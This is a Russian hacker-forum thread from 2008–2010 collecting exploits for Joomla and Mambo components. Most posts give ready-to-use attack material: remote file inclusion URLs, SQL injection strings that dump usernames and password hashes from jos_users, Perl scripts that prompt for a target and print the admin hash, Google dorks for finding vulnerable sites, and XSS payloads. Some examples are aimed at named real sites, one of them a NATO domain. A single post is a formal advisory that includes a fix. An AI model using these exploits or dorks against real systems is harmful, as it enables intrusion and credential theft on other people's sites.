1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости Joomla && Mambo

Тема в разделе "Уязвимости популярных CMS", создана пользователем NetSky, 3 ноя 2008.

  1. NetSky
    NetSky адепт Модератор
    Симпатии:
    90
    03 ноября, 2008

    Программа: Flash Tree Gallery (компонент к Joomla) 1.0, возможно другие версии.

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_live_site" в сценарии administrator/components/com_treeg/admin.treeg.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.


    |::Exploit::|​


    Код:
    ==================================================================================================================
    
    
      [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
    
           Software : com_treeg version 1.0
           Vendor   : http://justjoomla.net/
           Author   : NoGe
           Contact  : noge[dot]code[at]gmail[dot]com
    
    
    ==================================================================================================================
    
    
      [o] Vulnerable file
    
           administrator/components/com_treeg/admin.treeg.php
    
            include( "$mosConfig_live_site/components/com_treeg/about.html" );
    
    
    
      [o] Exploit
    
           http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
    
    
    ==================================================================================================================
    
    
      [o] Greetz
    
           MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
           VOP Crew [ Vrs-hCk OoN_BoY Paman ]
           H312Y yooogy mousekill }^-^{ kaka11  martfella
           skulmatic olibekas ulga Cungkee k1tk4t str0ke
    
            
    ==================================================================================================================
    
    # milw0rm.com [2008-11-01]



    (c) _www.securitylab.ru
    Оригинал
     
    3 ноя 2008
  2. NetSky
    NetSky адепт Модератор
    Симпатии:
    90
    PHP-инклюдинг в Joomla Dada Mail Manager

    10 ноября, 2008

    Программа: Dada Mail Manager (компонент к Joomla) 2.6, возможно другие версии.

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_dadamail/config.dadamail.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.

    URL производителя: _joomlander.net/index.php?option=com_remository&Itemid=0&func=fileinfo&id=53

    Решение: Способов устранения уязвимости не существует в настоящее время.


    |::Exploit::|

    Код:
    ======================================================================================================================================
    
    
      [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
    
           Software : com_dadamail version 2.6
           Vendor   : http://joomlander.net
           Download : http://joomlacode.org/gf/project/dadamailmanager/frs
           Author   : NoGe
           Contact  : noge[dot]code[at]gmail[dot]com
           Blog     : http://evilc0de.blogspot.com
    
    
    ======================================================================================================================================
    
    
      [o] Vulnerable file
    
           administrator/components/com_dadamail/config.dadamail.php
    
            require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
    
    
    
      [o] Exploit
    
           http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
    
    
    ======================================================================================================================================
    
    
      [o] Greetz
    
           MainHack BrotherHood [ http://serverisdown.org/blog/]
           Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
           H312Y yooogy mousekill }^-^{ kaka11  martfella
           skulmatic olibekas ulga Cungkee k1tk4t str0ke
    
            
    ======================================================================================================================================
    
    # milw0rm.com [2008-11-05]



    (c) _www.securitylab.ru
    Оригинал
     
    10 ноя 2008
  3. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    Joomla Component JooBlog

    Код:
    ####################################################### 
     Joomla Component com_jb2(PostID) SQL-injetion Vulnerability 
    ####################################################### 
     
    ################################################### 
    #[~] Author :  boom3rang 
    #[~] Kosova Hackers Group [www.khg-crew.ws] 
    #[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. 
     
    #[!] Module_Name:  com_jb2 
    #[!] Script_Name:  Joomla 
    #[!] Google_Dork:  inurl:"option=com_jb2 "PostID" 
    ################################################## 
     
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
    #[~] Example: 
    http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] 
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
    #[~] Exploit: 
    -9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* 
    -------------------------------------------------------------------------------------------------------------------------------------------------- 
     
    ############################## 
    #[!] Proud 2 be Albanian 
    #[!] Proud 2 be Muslim 
    #[!] United States of Albania 
    ############################## 
     
    3 дек 2008
  4. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    #Joomla com_phocadocumentation Sql injection#


    PHP:
    #!/usr/bin/perl -w


    #Joomla com_phocadocumentation Sql injection#
    ########################################
    #[~] Author : EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label TURK Godlike Nitrous

    #[!] Module_Name: com_phocadocumentation
    #[!] Script_Name: Joomla
    #[!] Google_Dork: inurl:"com_phocadocumentation"
    ########################################


    system("color FF0000");
    system("Nohacking");
    print 
    "\t\t-------------------------------------------------------------\n\n";
    print 
    "\t\t| Turkish Securtiy Team |\n\n";
    print 
    "\t\t-------------------------------------------------------------\n\n";
    print 
    "\t\t|Joomla Module com_phocadocumentation(section&id=)Remote SQL Injection Vuln|\n\n";
    print 
    "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";
    print 
    "\t\t-------------------------------------------------------------\n\n";

    use 
    LWP::UserAgent;

    print 
    "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
    chomp(my $target=<STDIN>);

    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";

    $b LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

    $host $target "/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
    $res $b->request(HTTP::Request->new(GET=>$host));
    $answer $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
    print 
    "\n[+] Admin Hash : $1\n\n";
    print 
    "# Tebrikler Exploit Calisti! #\n\n";
    }
    else{print 
    "\n[-] Exploit Bulunamadı...\n";
    }

    # milw0rm.com [2009-01-05]
    #Joomla com_na_newsdescription Sql injection#​


    PHP:
    #!/usr/bin/perl -w
     
     
    #Joomla com_na_newsdescription Sql injection#
    ########################################
    #[~] Author :  EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label TURK Godlike Nitrous
     
    #[!] Module_Name:  com_na_newsdescription
    #[!] Script_Name:  Joomla
    #[!] Google_Dork:  inurl:"com_na_newsdescription"
    ########################################
     
     
    system("color FF0000");
    system("Nohacking");
    print 
    "\t\t-------------------------------------------------------------\n\n";
    print 
    "\t\t|                 Turkish Securtiy Team                      |\n\n";
    print 
    "\t\t-------------------------------------------------------------\n\n";
    print 
    "\t\t|Joomla Module com_na_newsdescription(show&groupId=)Remote SQL Injection Vuln|\n\n";
    print 
    "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
    print 
    "\t\t-------------------------------------------------------------\n\n";
     
    use 
    LWP::UserAgent;
     
    print 
    "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
     
    chomp(my $target=<STDIN>);
     
    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";
     
    $b LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     
    $host $target .   "/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+".$column_name.",1,2,3,4,5,6,7+from/**/".$table_name."--";< BR>$res $b->request(HTTP::Request->new(GET=>$host));
    $answer $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
      print 
    "\n[+] Admin Hash : $1\n\n";
      print 
    "#   Tebrikler Exploit Calisti!  #\n\n";
    }
    else{print 
    "\n[-] Exploit Bulunamadı...\n";
    }

    # milw0rm.com [2009-01-05]
    #Joomla com_simple_review Sql injection#​


    Код:
    #Joomla com_simple_review Sql injection#
    ########################################
    #[~] Author :  EcHoLL
    #[~] www.warezturk.org www.tahribat.com
    #[~] Greetz : Black_label Hippi Godlike Nitrous
    
    #[!] Module_Name:  com_simple_review
    #[!] Script_Name:  Joomla
    #[!] Google_Dork:  inurl:"com_simple_review"
    ########################################
     
    www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
    
     <name>simple_review</name>
     <creationDate>29/05/2006</creationDate>
     <author>Rowan Youngson</author>
     <copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
     <authorEmail> rowans@gmail.com </authorEmail>
    
     <authorUrl>www.row1.info</authorUrl>
     <version>1.3.5</version>
     <description>Simple Review is a Review component for the Mambo CMS</description>
    
    # milw0rm.com [2009-01-05]
     
    9 янв 2009
  5. Mei
    Mei bit of love Продвинутый
    Симпатии:
    214
    Joomla Exploit

    Joomla com_reservation (Itemid) Remote SQL Injection Exploit​

    Код:
    #!/usr/bin/perl -w
     
    
    
    ###############################################
    #[~] Author         :ByALBAYX                 #
    #                                             #
    #[~] Web Site       :WWW.C4TEAM.ORG           #
    #                                             #
    #[~] Component_Name :Reservation Manager      #
    #[~] Component_Name :Reservation Manager Pro  #
    #                                             #
    #[~] Script_Name    :Joomla                   #
    #                                             #
    #[~] Dork           :com_reservation   vs..   #
    #                                             # 
    #[~] S.Site         :http://webformatique.com #     
    #                                             #     
    ###############################################
    
     
     
    system("color f");
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|||                        C4 TEAM                         |||\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t|||      Reservation Manager Pro  Remote SQL Inj Vuln      |||\n\n";
    print "\t\t|||       BYALBAYX     WWWW.C4TEAM.ORG     BYALBAYX        |||\n\n";
    print "\t\t-------------------------------------------------------------\n\n";
     
    use LWP::UserAgent;
     
    print "\n[http://wwww.site.com/path/]: ";
     chomp(my $target=<STDIN>);
     
    $column_name="concat(username,0x3a,password)";
    $table_name="jos_users";
     
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
     
    $host = $target .   "/index.php?option=com_reservation&Itemid=1+union+select+1,".$column_name."+from/**/".$table_name."--";
    $res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
      print "\n[+] Admin Hash : $1\n\n";
      print "#   Tebrikler Exploit Calisti!  #\n\n";
    }
    else{print "\n[-] Exploit Calismadi...\n";
    }
    
    # milw0rm.com [2009-03-04

     
    Последнее редактирование модератором: 5 мар 2009
    4 мар 2009
    1 человеку нравится это.
  6. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Joomla! 1.5.10 JA_Purity Multiple Persistent XSS

    Код:
    =============================================
    INTERNET SECURITY AUDITORS ALERT 2009-006
    - Original release date: April 5th, 2009
    - Last revised: June 5th, 2009
    - Discovered by: Juan Galiana Lara
    - Severity: 6.4/10 (CVSS Base Score)
    =============================================
    
    I. VULNERABILITY
    -------------------------
    Joomla! 1.5.10 JA_Purity Multiple Persistent XSS
    
    II. BACKGROUND
    -------------------------
    Joomla! is an award-winning content management system (CMS), which
    enables you to build Web sites and powerful online applications. Many
    aspects, including its ease-of-use and extensibility, have made
    Joomla! the most popular Web site software available. Best of all,
    Joomla! is an open source solution that is freely available to everyone.
    Joomla! comes with 3 default templates, JA_Purity is one of them.
    
    III. DESCRIPTION
    -------------------------
    JA_Purity template is bundled in Joomla! and fails to sanitized user
    supplied input. An attacker can inject JavaScript or DHTML that will
    be saved in the cookie making persistent, running in the context of
    targeted user browser, allowing him to steal cookies.
    
    In file 'template/ja_purity/ja_templatetools.php', the
    getUserSetting() reads $_GET array and makes the data persistent
    setting it in a cookie:
    
    define ('JA_TOOL_FONT', 'ja_font');
    ...
    function getUserSetting(){
    $exp = time() + 60*60*24*355;
    if (isset($_COOKIE[$this->template.'_tpl']) &&
    $_COOKIE[$this->template.'_tpl'] == $this->template){
    foreach($this->_params_cookie as $k=>$v) {
    $kc = $this->template."_".$k;
    if (isset($_GET[$k])){
    $v = $_GET[$k];
    setcookie ($kc, $v, $exp, '/');
    }else{
    if (isset($_COOKIE[$kc])){
    $v = $_COOKIE[$kc];
    }
    }
    $this->setParam($k, $v);
    }
    
    }else{
    setcookie ($this->template.'_tpl', $this->template, $exp,
    '/');
    }
    return $this;
    }
    
    function getParam ($param, $default='') {
    if (isset($this->_params_cookie[$param])) {
    return $this->_params_cookie[$param];
    }
    return $this->_tpl->params->get($param, $default);
    }
    
    function setParam ($param, $value) {
    $this->_params_cookie[$param] = $value;
    }
    
    File 'template/ja_purity/index.php' reads data with getParam and write
    it directly:
    
    <?php if ($tmpTools->getParam('theme_header') &&
    $tmpTools->getParam('theme_header')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/header/<?php echo $tmpTools->getParam('theme_header');
    ?>/style.css" type="text/css" />
    <?php endif; ?>
    <?php if ($tmpTools->getParam('theme_background') &&
    $tmpTools->getParam('theme_background')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/background/<?php echo
    $tmpTools->getParam('theme_background'); ?>/style.css" type="text/css" />
    <?php endif; ?>
    <?php if ($tmpTools->getParam('theme_elements') &&
    $tmpTools->getParam('theme_elements')!='-1') : ?>
    <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
    ?>/styles/elements/<?php echo $tmpTools->getParam('theme_elements');
    ?>/style.css" type="text/css" />
    <?php endif; ?>
    
    <body id="bd" class="fs<?php echo
    $tmpTools->getParam(JA_TOOL_FONT);?> <?php echo $tmpTools->browser();?>" >
    
    if ($tmpTools->getParam('logoType')=='image'): ?>
    <h1 class="logo">
    <a href="index.php" title="<?php echo $siteName;
    ?>"><span><?php echo $siteName; ?></span></a>
    </h1>
    <?php else:
    $logoText = (trim($tmpTools->getParam('logoText'))=='') ?
    $config->sitename : $tmpTools->getParam('logoText');
    $sloganText = (trim($tmpTools->getParam('sloganText'))=='')
    ? JText::_('SITE SLOGAN') : $tmpTools->getParam('sloganText'); ?>
    <h1 class="logo-text">
    <a href="index.php" title="<?php echo $siteName;
    ?>"><span><?php echo $logoText; ?></span></a>
    </h1>
    <p class="site-slogan"><?php echo $sloganText;?></p>
    <?php endif; ?>
    
    These are all the variables of JA_Purity template, most of them are
    vulnerable:
    
    logoType
    logoText
    sloganText
    ja_font
    ja_screen
    ja_screen_width
    theme_header
    theme_background
    theme_elements
    horNav
    horNavType
    rightCollapsible
    rightCollapseDefault
    excludeModules
    showComponent
    
    IV. PROOF OF CONCEPT
    -------------------------
    http://site/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%
    2Fscript%3E
    http://site/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B
    %3C%2Fscript%3E
    http://site/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3
    C%2Fscript%3E
    http://site/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C
    %2Fscript%3E
    http://site/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%
    3C%2Fscript%3E
    http://site/path/?excludeModules=%27;alert(8);%20var%20b=%27
    http://site/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
    http://site/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscr
    ipt%3E
    
    V. BUSINESS IMPACT
    -------------------------
    An attacker can exploit the vulnerability to store persistent XSS.
    This may lead in steal the targeted user cookies and gain access to
    the user account.
    
    VI. SYSTEMS AFFECTED
    -------------------------
    Joomla! <= 1.5.10 is vulnerable which comes with JA_Purity template 1.2.0
    
    VII. SOLUTION
    -------------------------
    Upgrade to version 1.5.11.
    
    All inputs should be sanitized at setParam/getParam function, in the
    same way is done in libraries/joomla/environment/request.php:140 with
    $var = JRequest::_cleanVar($input[$name], $mask, $type);
    
    VIII. REFERENCES
    -------------------------
    http://www.joomla.org
    http://www.joomlart.org
    http://www.isecauditors.com
    
    IX. CREDITS
    -------------------------
    This vulnerability has been discovered
    by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
    
    X. REVISION HISTORY
    -------------------------
    April 5, 2009: Initial release.
    June 5, 2009: Last revision.
    
    XI. DISCLOSURE TIMELINE
    -------------------------
    April 5, 2009: Discovered by Internet Security Auditors.
    April 6, 2009: Vendor contacted. They will study the advisory.
    May-June, 2009: No responses to queries about patching schedule.
    June 3, 2009: Security Release 1.5.11 published.
    
    XII. LEGAL NOTICES
    -------------------------
    The information contained within this advisory is supplied "as-is"
    with no warranties or guarantees of fitness of use or otherwise.
    Internet Security Auditors accepts no responsibility for any damage
    caused by the use or misuse of this information.
    securityfocus.com
     
    Последнее редактирование: 15 июн 2009
    14 июн 2009
  7. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Программа: HD FLV Player (компонент к Joomla) 1.3, возможно более ранние версии

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии index.php, когда параметр "option" равен "com_hdflvplayer". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    URL производителя: www.hdflvplayer.net

    Решение: Способов устранения уязвимости не существует в настоящее время.
    ©securitylab.ru​

    пример
    Код:
    ht*p://30days.isaf.nato.int/index.php?option=com_hdflvplayer&Itemid=127&id=27+and+0--&page=1
    Код:
    ht*p://30days.isaf.nato.int/index.php?option=com_hdflvplayer&Itemid=127&id=27+and+1--&page=1
     
    3 мар 2010
  8. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    SQL-инъекция в Joomla YaNC(компонент)
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "listid" в сценарии index.php, когда параметр "option" равен "com_yanc". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Способов устранения уязвимости не существует в настоящее время.

    Код:
    [*] Author    :  His0k4 [ALGERIAN HaCkEr]
    
    [*] Dork      :  inurl:com_yanc listid
    
    [*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid={SQL}
    
    [*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_yanc&Itemid=179&listid=-1 UNION SELECT concat(username,0x3a,password),@@version FROM jos_users--
     
    17 мар 2010
  9. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    Множественные уязвимости в Joomla VXDate

    VXDate (компонент для Joomla)
    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

    1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии index.php, когда параметр "option" равен "com_vxdate", параметр "md" равен "details" или "editform", и установлен параметр "ct". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии index.php, когда параметр "option" равен "com_vxdate", параметр "md" равен "details" или "editform", и установлен параметр "ct". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Код:
    SQL Injection:
    
    http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
    
    http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
    
    XSS:
    
    http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
    http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Истоник
     
    19 мар 2010
  10. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    JE Form Creator (компонент к Joomla!)

    JE Form Creator
    Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "view" в сценарии index.php, когда параметр "option" равен "com_jeformcr". Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть отключена в конфигурационном файле PHP.

    П.С. надеюсь пользоваться точкой и слешом все умеют))
     
    23 мар 2010
    1 человеку нравится это.
  11. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    Хреновый день для компонентов Joomla

    Joomla Component com_departments SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_departments SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_departments SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_departments&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4,5,6,7,8--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    
    [~] Demo            :
    
    http://server/index.php?option=com_departments&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_units SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_units SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
     
    [~]######################################### InformatioN #############################################[~]
      
    [~] Title     : Joomla Component com_units SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
      
    [~]#########################################   ExploiT   #############################################[~]
      
    [~] Vulnerable File :
      
    http://127.0.0.1/index.php?option=com_units&task=unit&id=[SQL]
      
    [~] ExploiT         :
      
    -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
      
    [~] Example         :
      
    http://127.0.0.1/index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
     
    [~]######################################### ThankS To ... ############################################[~]
      
    [~] Special Thanks To My Best FriendS :
      
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
      
    [~] IRANIAN Young HackerZ
      
    [~]#########################################   FinisH :D   #############################################[~]
    // sebug.net [2010-03-29]
    Joomla Component com_radio SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_radio SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_radio SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4,5,6,7,8--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    
    [~] Demo            :
    
    http://server/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,version(),5,6,7,8--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_business SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_business SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_business SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_business&view=business&region=37&category_id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3--
    
    [~] Demo            :
    
    http://server/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,version()--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_adds Blind SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_adds Blind SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_adds Blind SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_adds&action=view&catid=[Blind SQL]
     
    [~] ExploiT         :
     
    12+AND+1=0+UNION+SELECT+1,2--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_personal SQL Injection Vulnerability
    Код:
    # Title : Joomla Component com_personal SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_personal SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_personal&pid=56&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_personal&pid=56&id=-1 UNION SELECT 1,2,3,4
     
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
     
    29 мар 2010
  12. EXploit
    EXploit Продвинутый
    Симпатии:
    50
    Очередной хреновый день компонентов...

    Joomla Component com_store XSS Vulnerability
    Код:
    [x] Joomla Component Store
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Store
    [x] Example: http://www.site.com/index.php?option=com_store=[XSS]
    [x] Demo: http://www.kingpincruisers.net/index.php?option=com_store=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_jombib XSS Vulnerability
    Код:
    [x] Joomla Component Jombib
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
